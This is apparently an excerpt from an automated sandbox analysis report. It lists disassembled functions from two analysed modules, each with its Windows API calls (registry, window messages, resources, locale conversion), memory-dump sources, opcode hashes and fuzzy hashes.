                                                                                                                Function 0127288D, Relevance: 6.1, APIs: 4, Instructions: 121registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 01272897
                                                                                                                  • Part of subcall function 01264A35: RegCloseKey.ADVAPI32(00000000), ref: 01264ADD
                                                                                                                  • Part of subcall function 01264A35: RegCloseKey.ADVAPI32(00000000), ref: 01264AE8
                                                                                                                • _memset.LIBCMT ref: 01272935
                                                                                                                • _memset.LIBCMT ref: 01272985
                                                                                                                • RegEnumValueA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 012729FD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Close_memset$EnumH_prolog3_Value
                                                                                                                • String ID:
                                                                                                                • API String ID: 3508048145-0
                                                                                                                • Opcode ID: 2c0a50d9e345187889d3401d803cc333af96a515af66531b9b0d6ff27c59df55
                                                                                                                • Instruction ID: c2f1fb9bbf0840e0f91e9402bc34a75874d1ade52510844f2412ed4ab9e17560
                                                                                                                • Opcode Fuzzy Hash: 2c0a50d9e345187889d3401d803cc333af96a515af66531b9b0d6ff27c59df55
                                                                                                                • Instruction Fuzzy Hash: EA410AB195112DAFDB24EBA4DCD8AEEB7BCAF28304F5041D9A109A7190DB745F84CF60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01264C8F, Relevance: 6.1, APIs: 4, Instructions: 118registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetPrivateProfileStringA.KERNEL32(?,?,?,?,00001000,?), ref: 01264DDE
                                                                                                                  • Part of subcall function 01264E12: RegCloseKey.ADVAPI32(00000000,?,?,?,?,01264C3A,?,00000000), ref: 01264E57
                                                                                                                • RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,00000000,?,00000000,?,00000000,DDD5D539,?,?,?,?,01296E8B,000000FF), ref: 01264D30
                                                                                                                • RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,00000000,?,?,?,?,?,?,01296E8B,000000FF), ref: 01264D69
                                                                                                                • RegCloseKey.ADVAPI32(00000000,?,?,?,?,01296E8B,000000FF), ref: 01264D83
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CloseQueryValue$PrivateProfileString
                                                                                                                • String ID:
                                                                                                                • API String ID: 2114517702-0
                                                                                                                • Opcode ID: 376e7f7ea6642c53655833cae738e4eadf129d4dcbb2d620518713f9147e9b42
                                                                                                                • Instruction ID: 1d4478b58e623313af659ed51ddaf6aa7f4d36b6b7501ab38e65b7c31b1b35a4
                                                                                                                • Opcode Fuzzy Hash: 376e7f7ea6642c53655833cae738e4eadf129d4dcbb2d620518713f9147e9b42
                                                                                                                • Instruction Fuzzy Hash: 1A413371D1019AABDF25DF54CC44AFEB7BCEB14354F00419AE599A3280DBB49EC49F60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0126FA17, Relevance: 6.1, APIs: 4, Instructions: 101windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 0126FA4A
                                                                                                                • SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 0126FAAA
                                                                                                                • SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 0126FAEF
                                                                                                                • SendMessageA.USER32(?,000000F1,00000000,00000000), ref: 0126FB17
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3850602802-0
                                                                                                                • Opcode ID: 903ab591b7a2a77985defefb4b487ac6b5cd1d8fb20bd1d95d6c44cf823ca0e0
                                                                                                                • Instruction ID: bed3204a43933b84eb41724d4f2115b52218a4a1de51b36c2f974eba1d212e6e
                                                                                                                • Opcode Fuzzy Hash: 903ab591b7a2a77985defefb4b487ac6b5cd1d8fb20bd1d95d6c44cf823ca0e0
                                                                                                                • Instruction Fuzzy Hash: BB315071660207AFEF159E64E9B0F797BADEB48240F144469EA01DB2D5DA70ECD0CAA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 012631CB, Relevance: 6.1, APIs: 4, Instructions: 99windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetMenuCheckMarkDimensions.USER32 ref: 012631E1
                                                                                                                • _memset.LIBCMT ref: 01263260
                                                                                                                • CreateBitmap.GDI32(?,?,?,?,?), ref: 012632CB
                                                                                                                • LoadBitmapW.USER32(00000000,00007FE3), ref: 012632E3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 4271682439-0
                                                                                                                • Opcode ID: 464a3b613b897408a46a13492cfacbd0d092007f382acd7cbd896e9b9fa1a1ae
                                                                                                                • Instruction ID: 9f7489867a2e001d1a0ff6ba205015971c17cbfb7555d4c0997a523371d6869d
                                                                                                                • Opcode Fuzzy Hash: 464a3b613b897408a46a13492cfacbd0d092007f382acd7cbd896e9b9fa1a1ae
                                                                                                                • Instruction Fuzzy Hash: 2631B871E102299BEB30DF189C84BAD77B8FB84715F0040AEE54DE7281DA70AD85CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01292D2D, Relevance: 6.1, APIs: 4, Instructions: 97COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 01292D63
                                                                                                                • __isleadbyte_l.LIBCMT ref: 01292D91
                                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,0128D1CA,00000001,00000000,00000000,?,00000000,00000000,?,?,0128D1CA,00000000), ref: 01292DBF
                                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,0128D1CA,00000001,00000000,00000000,?,00000000,00000000,?,?,0128D1CA,00000000), ref: 01292DF5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                • String ID:
                                                                                                                • API String ID: 3058430110-0
                                                                                                                • Opcode ID: 65d234f1f347e59c70da2ff388bd608a178ffa67e8a9aa4c4415e81cf79a8f05
                                                                                                                • Instruction ID: 8c882e07d9851330b789cd358fe49a5d3719cd26b6b1f8c4410736c0fbf450da
                                                                                                                • Opcode Fuzzy Hash: 65d234f1f347e59c70da2ff388bd608a178ffa67e8a9aa4c4415e81cf79a8f05
                                                                                                                • Instruction Fuzzy Hash: 1231C231614247FFDF219E2DC884ABA7FA9FF41310F054069EA5487190D731E451CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1009D31D, Relevance: 6.1, APIs: 4, Instructions: 97COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1009D353
                                                                                                                • __isleadbyte_l.LIBCMT ref: 1009D381
                                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,10080827,00000001,00000000,00000000), ref: 1009D3AF
                                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,10080827,00000001,00000000,00000000), ref: 1009D3E5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                • String ID:
                                                                                                                • API String ID: 3058430110-0
                                                                                                                • Opcode ID: 58e05172a30f684a45ae2f880d6e874f9ef33047899ee41d2091284c30dded0d
                                                                                                                • Instruction ID: 0cae0c88b142bee1c31961b1c38ca584f7df38285f1d548ae6eb96a590ba0826
                                                                                                                • Opcode Fuzzy Hash: 58e05172a30f684a45ae2f880d6e874f9ef33047899ee41d2091284c30dded0d
                                                                                                                • Instruction Fuzzy Hash: 1D31A131A40256EFDB11EF75C844BAA7BE5FF41352F12C12AE858871A0E730EA50EB51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 012721FF, Relevance: 6.1, APIs: 4, Instructions: 95timeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 0127224B
                                                                                                                  • Part of subcall function 01268275: __CxxThrowException@8.LIBCMT ref: 01268289
                                                                                                                • __EH_prolog3.LIBCMT ref: 01272269
                                                                                                                • SetTimer.USER32(00000000,?,00000000), ref: 012722EB
                                                                                                                  • Part of subcall function 01271117: GetModuleHandleW.KERNEL32(shell32.dll,?,?,01272291,012A0E18,00000000,00000000,?,00000008,0129BD34,?,?,012715AB,?,?,00000000), ref: 01271129
                                                                                                                  • Part of subcall function 01271117: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 01271139
                                                                                                                  • Part of subcall function 01271117: EncodePointer.KERNEL32(00000000,?,?,01272291,012A0E18,00000000,00000000,?,00000008,0129BD34,?,?,012715AB,?,?,00000000), ref: 01271142
                                                                                                                  • Part of subcall function 01269382: __EH_prolog3.LIBCMT ref: 01269389
                                                                                                                • CoTaskMemFree.OLE32(?), ref: 012722C8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3$AddressEncodeException@8FreeHandleModulePointerProcTaskThrowTimer_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3671238176-0
                                                                                                                • Opcode ID: afac785dba0321601a74f37b9269bd5f2d1b9a745288dedb4ac643861e88cf2d
                                                                                                                • Instruction ID: 2161b1a6f59eb97b3eaaf15475f892ffae0b58b9f83032b50d3112988e7cdc40
                                                                                                                • Opcode Fuzzy Hash: afac785dba0321601a74f37b9269bd5f2d1b9a745288dedb4ac643861e88cf2d
                                                                                                                • Instruction Fuzzy Hash: 5C31D171620206AFEB28EF68DD45B7FBBA9FF90314F14842DE65A971D0DB709940CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0127F263, Relevance: 6.1, APIs: 4, Instructions: 88COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 0127F26A
                                                                                                                  • Part of subcall function 01262C72: _malloc.LIBCMT ref: 01262C8E
                                                                                                                • __CxxThrowException@8.LIBCMT ref: 0127F2A3
                                                                                                                • __EH_prolog3.LIBCMT ref: 0127F2B0
                                                                                                                • __cftof.LIBCMT ref: 0127F345
                                                                                                                  • Part of subcall function 01273DFF: __EH_prolog3.LIBCMT ref: 01273E06
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3$Exception@8Throw__cftof_malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 3357512520-0
                                                                                                                • Opcode ID: af485d0009f856c96077596c13e85a0111179227620cfb392aa8613ffc447e86
                                                                                                                • Instruction ID: 8a289262b6a8fde1db66f21c44f0b8f910f1b562fa516b6f94d4b8187b739445
                                                                                                                • Opcode Fuzzy Hash: af485d0009f856c96077596c13e85a0111179227620cfb392aa8613ffc447e86
                                                                                                                • Instruction Fuzzy Hash: 1E316D7192124BABDF15EFB8CD44BBF7B68BF24310F044929A622961D0DB34D654DB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1001252B, Relevance: 6.1, APIs: 4, Instructions: 87COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Copy_impl
                                                                                                                • String ID:
                                                                                                                • API String ID: 532805948-0
                                                                                                                • Opcode ID: d05c1ab510a0da6ec16a3229397f2f201ca63465eba088ffa9b0d696c72757db
                                                                                                                • Instruction ID: e1799d4f19871ea75a411a261b621a9bf3d42c47b965af931576866c22275973
                                                                                                                • Opcode Fuzzy Hash: d05c1ab510a0da6ec16a3229397f2f201ca63465eba088ffa9b0d696c72757db
                                                                                                                • Instruction Fuzzy Hash: B221BFB2600520EFCF20DF6CCAD1D5ABBF6EF857907158259E84A9F216C631F890DB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01274A46, Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 01274A4D
                                                                                                                  • Part of subcall function 01262C72: _malloc.LIBCMT ref: 01262C8E
                                                                                                                • __CxxThrowException@8.LIBCMT ref: 01274A83
                                                                                                                • __EH_prolog3_catch.LIBCMT ref: 01274A90
                                                                                                                • __cftof.LIBCMT ref: 01274B1F
                                                                                                                  • Part of subcall function 012749D2: __EH_prolog3.LIBCMT ref: 012749D9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3$Exception@8H_prolog3_catchThrow__cftof_malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 1872082170-0
                                                                                                                • Opcode ID: 90b8c19abb36a4cd722ab5fa0745367d25104d3a742704e34187dda57df87b88
                                                                                                                • Instruction ID: 0257d39b0c6f5017c0b45063b9c6f66979e6dee68e78512ba903d442b89ab0ce
                                                                                                                • Opcode Fuzzy Hash: 90b8c19abb36a4cd722ab5fa0745367d25104d3a742704e34187dda57df87b88
                                                                                                                • Instruction Fuzzy Hash: D8316F71921247ABDF15FFB8CC54BBFB769BF20310F144529A522A72D0EB349A50CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0126343A, Relevance: 6.1, APIs: 4, Instructions: 82threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 01263444
                                                                                                                  • Part of subcall function 01266A82: __EH_prolog3.LIBCMT ref: 01266A89
                                                                                                                • GetCurrentThread.KERNEL32 ref: 0126349B
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 012634A4
                                                                                                                • GetVersionExA.KERNEL32 ref: 01263540
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CurrentThread$H_prolog3H_prolog3_Version
                                                                                                                • String ID:
                                                                                                                • API String ID: 786120064-0
                                                                                                                • Opcode ID: abd53e05a321bfcca37f06e8795aa2125b0ecb0c50ee41271bbc539f682e2f3c
                                                                                                                • Instruction ID: 907d1a385ab94d27c738d889b1cfa9885da7a225382e6aa00cebabc5bad7d83c
                                                                                                                • Opcode Fuzzy Hash: abd53e05a321bfcca37f06e8795aa2125b0ecb0c50ee41271bbc539f682e2f3c
                                                                                                                • Instruction Fuzzy Hash: 1C41BCB4921B06CFD721DF2A85847AAFAF4BF48704F90896ED1AE87650DB70A584CF11
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 012768FA, Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CharNext$__wcstoi64_strtoulstrtoxl
                                                                                                                • String ID:
                                                                                                                • API String ID: 1461710997-0
                                                                                                                • Opcode ID: 9f5b6d3546c372f794d2a94991b37a9bcaffbda61012d82feab16215f552a8c4
                                                                                                                • Instruction ID: 0414f39f59fbe4ba67e3f9186f968bd51db85c44637595c435f4536423845279
                                                                                                                • Opcode Fuzzy Hash: 9f5b6d3546c372f794d2a94991b37a9bcaffbda61012d82feab16215f552a8c4
                                                                                                                • Instruction Fuzzy Hash: 39110671524657DBEB31AF38CC40BFF7BF89F59210F140059EA81D7180EA749580CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 012794E5, Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SafeArrayDestroy.OLEAUT32(?), ref: 01279507
                                                                                                                • CoTaskMemFree.OLE32(00000002,?,012794C6,?,?,?,?,?,?,?,?,01278718,?,?,?,?), ref: 0127958B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ArrayDestroyFreeSafeTask
                                                                                                                • String ID:
                                                                                                                • API String ID: 3253174383-0
                                                                                                                • Opcode ID: c081be696cfdb783365651d10f7419b3a66050716bd4e769ae4d9bb5651d4144
                                                                                                                • Instruction ID: f26dd83db62d23cb4135ff82a58a0b31432cb2915ed132739ddedcc3e30500dd
                                                                                                                • Opcode Fuzzy Hash: c081be696cfdb783365651d10f7419b3a66050716bd4e769ae4d9bb5651d4144
                                                                                                                • Instruction Fuzzy Hash: EC116D319203279BEF358F2CE848B677F66AF45779B144128EB469A164C736DA80CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0126CF26, Relevance: 6.1, APIs: 4, Instructions: 65windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 0126CF50
                                                                                                                • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 0126CF76
                                                                                                                • GetCapture.USER32 ref: 0126CF88
                                                                                                                • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 0126CF97
                                                                                                                  • Part of subcall function 01268275: __CxxThrowException@8.LIBCMT ref: 01268289
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$CaptureException@8Throw
                                                                                                                • String ID:
                                                                                                                • API String ID: 1331319163-0
                                                                                                                • Opcode ID: dfe1a0c1395e65d15a9878a0bdaa11778e66716ac2fe92a389577094b22dd200
                                                                                                                • Instruction ID: f9959371c3ed03c67f01253b7b0e0f3b592c5dd547d762dbe6a9b480e3e85cab
                                                                                                                • Opcode Fuzzy Hash: dfe1a0c1395e65d15a9878a0bdaa11778e66716ac2fe92a389577094b22dd200
                                                                                                                • Instruction Fuzzy Hash: 8811657136030E7FFE312B659C89FBB776DEF48B98F050025F7445A1E1DAA19C509AA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01267317, Relevance: 6.1, APIs: 4, Instructions: 62COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FindResourceA.KERNEL32(?,00000000,00000005), ref: 01267340
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 01267348
                                                                                                                • LockResource.KERNEL32(?), ref: 01267356
                                                                                                                • FreeResource.KERNEL32(?), ref: 012673AC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
